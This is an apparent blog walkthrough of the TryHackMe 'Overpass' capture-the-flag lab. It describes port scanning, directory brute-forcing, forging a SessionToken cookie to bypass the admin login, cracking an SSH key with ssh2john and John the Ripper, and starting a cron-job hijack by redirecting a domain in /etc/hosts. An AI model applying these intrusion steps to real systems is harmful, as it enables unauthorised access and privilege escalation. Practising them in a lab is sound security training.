TryHackMe|Overpass

Sampath Pendurthi

5 min readMar 5, 2021

Hello everyone,Let’s solve overpass series.overpass series is one of the best machines i ever solved.ok let’s begin .

This is the first machine in overpass series.it is rated as easy to solve.It comes with two flags.

Let’s begin.

i’m using Ubuntu as my attacker machine……..

First let’s find the open ports and thier versions by using nmap…

“nmap -sC -sV <IP> -oN scan -vv ”

ok we got two ports open 80 and 22.

Let’s find any interesting things in that website..

It’s just a website.Nothing found here.So,let’s bruteforce some directories.I’m using gobuster for finding directories.

“gobuster -u http://<IP> -w /usr/share/dirb/wordlists/common.txt -t 50”

After running gobuster i’ve some interesting directories…

Ok.There is an admin panel.But we don’t have any credentials to login.But i found something interesting here.

Let’s have a look at the login page…

Ok we’ve got no username and password but when we go through source code we’ll find some interesting javascript.

Ok.There is a main.js ,login.js and cookie.js. when we observe the code in login.js i found this.

Let’s obeserve this very close.I’ve spent my whole time here.i’m very new to javascript.So,if we observe the code.Let me explain the code.First it takes the input and assign some const variables which they can’t be changes and they will remain constant.and then it will send the credentials to api.If our credentials are wrong it will print Incorrect Credentials.if Credentials are correct it will set a SessionToken cookie.There is no value is given for the sessionToken.So let’s try to create a SessionToken cookie to bypass it.

Presently there are no cookie’s we’ll create one.

Ok i’ve created a cookie with name “SessionToken” And the value to that SessionToken is set to some random numbers.As the javascript is just create a cookie with the name SessionToken.there is no such values defined for sessiontoken.So,set it anything you want.now let’s refresh the admin page.

OK we’ve got a ssh Private key.But it is encrypted by using some military grade encryption.But i don’t know what kind of encryption it is.

Before bruteforcing the private key we need to change this private key into hash by using ssh2john tool.So let’s go the john the ripper directory for this python built tool.Locate the tools in your machine and run it.So,we got the hash but we need to find what is military grade encryption.

“python ssh2john.py id_rsa >hash”

Ok.Let’s open the hash..

This is the hash.Let’s crack this hash using john the ripper.

“john hash --wordlist=rockyou.txt”

i’ve build my john in ubuntu .so it will be different from yours.The above command will work you.

Ok.We got the password.Now let’s login using this password as james.

“ssh -i id_rsa james@<IP> “

Ok.We are in as james.Now if we list the files in the current directory.we can find our first flag.Ok

OK we are done with flag-1.Now it’s time to privilege escalation.I’m a little bit poor in this part.Ok ,without any delay let’s explore this machine a little bit and then we’ll look at priviesc.ok.we have a todo text file.Let’s open it.

“cat /home/james/todo.txt”

Sry i forgot to take screenshot here.So i’ve taken it when i completed the lab.That’s why it’s showing root.Don’t bother.Now let’s dig in.

Ok.this says paradox created some automated tasks but,they are not updating on the website.To find the automated tasks let’s open crontab.

“cat /etc/crontab”

Ok,here is the crontab.we have some buildscript but it is with the domain name.I searched for it but not found.This tooks me a while to figure it out.But unfortunately my knowledge is not enough.So i’ve gone through a writeup and got it. As we can see there is a domain name.So ,let’s open the /etc/hosts file to check .The doman is working on localhost.Not we’ll change the IP address to our machine Ip address and create buildscript.sh in the same path mentioned on the crontab.

“nano /etc/hosts”